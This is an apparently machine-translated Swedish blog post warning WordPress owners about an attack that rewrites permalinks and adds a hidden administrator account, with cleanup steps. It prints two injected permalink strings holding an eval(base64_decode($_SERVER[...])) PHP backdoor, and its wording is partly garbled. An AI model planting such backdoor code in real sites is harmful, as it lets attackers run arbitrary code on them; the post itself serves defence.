WordPress SQL Injection – Senaste attack

WordPress Brute Force Attacks, och vad du behöver göra Ät det

MÄnga webbplatser drabbades av en ny SQL-attack dÀr koder injiceras pÄ din webbplats. Denna MySQL-injektion pÄverkar dina permalÀnkar genom att göra dem ineffektiva. Som ett resultat kommer dina blogginlÀgg inte att fungera. MÄnga WordPress-bloggar riktades in i denna attack, tack till Andy Soward för att vi gjorde detta.

Det fanns en av följande koder som lades till i din permalÀnkstruktur pÄ grund av denna attack:

% & ({$ {eval (base64_decode ($ _ SERVER))[HTTP_REFERER]))}} |. +) &%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Dessa citat bifogade alla permalÀnkar pÄ din webbplats och det kan bara Àndras om de tas bort manuellt.

För att ÄtgÀrda detta, gÄ till:

InstÀllningar> PermalÀnkar och ta bort ovanstÄende kod och ersÀtt din standardkod.

NĂ€sta sak du behöver göra Ă€r att gĂ„ till AnvĂ€ndare. Du kommer att se att det finns mer Ă€n en administratör. Du kommer inte att se deras namn listat, men du kommer att se antalet ökat. SĂ„ vad du behöver göra Ă€r att titta pĂ„ alla anvĂ€ndare och hitta den sista som registrerade sig. LĂ€gg musen över den anvĂ€ndaren och fĂ„ lĂ€nken. Ändra koden userid = genom att lĂ€gga 1 till det numret. SĂ„ om den senaste anvĂ€ndaren som du kan se var anvĂ€ndare nr 2, lĂ€gg till 1 i den och gör den 3. Du bör hitta den dolda administratören har en konstig kod som förnamn. Radera koden och gör honom till en prenumerant. GĂ„ sedan tillbaka och ta bort honom.

Detta bör lösa problemet. Du kan ocksÄ ta bort honom genom att helt enkelt gÄ till din PHPMyAdmin. Eftersom du kommer att se anvÀndaren dÀr.

Vi ville bara fÄ ut de hÀr nyheterna sÄ snart vi kan, sÄ att vÄra anvÀndare kan uppdateras. Se till att du kontrollerar att din blogg inte Àr infekterad. Vi hoppas att WordPress snart kommer ut med en release.

Även om du inte har genomfört nĂ„gra av dessa Ă„tgĂ€rder för att sĂ€kra ditt WordPress-administrationsomrĂ„de.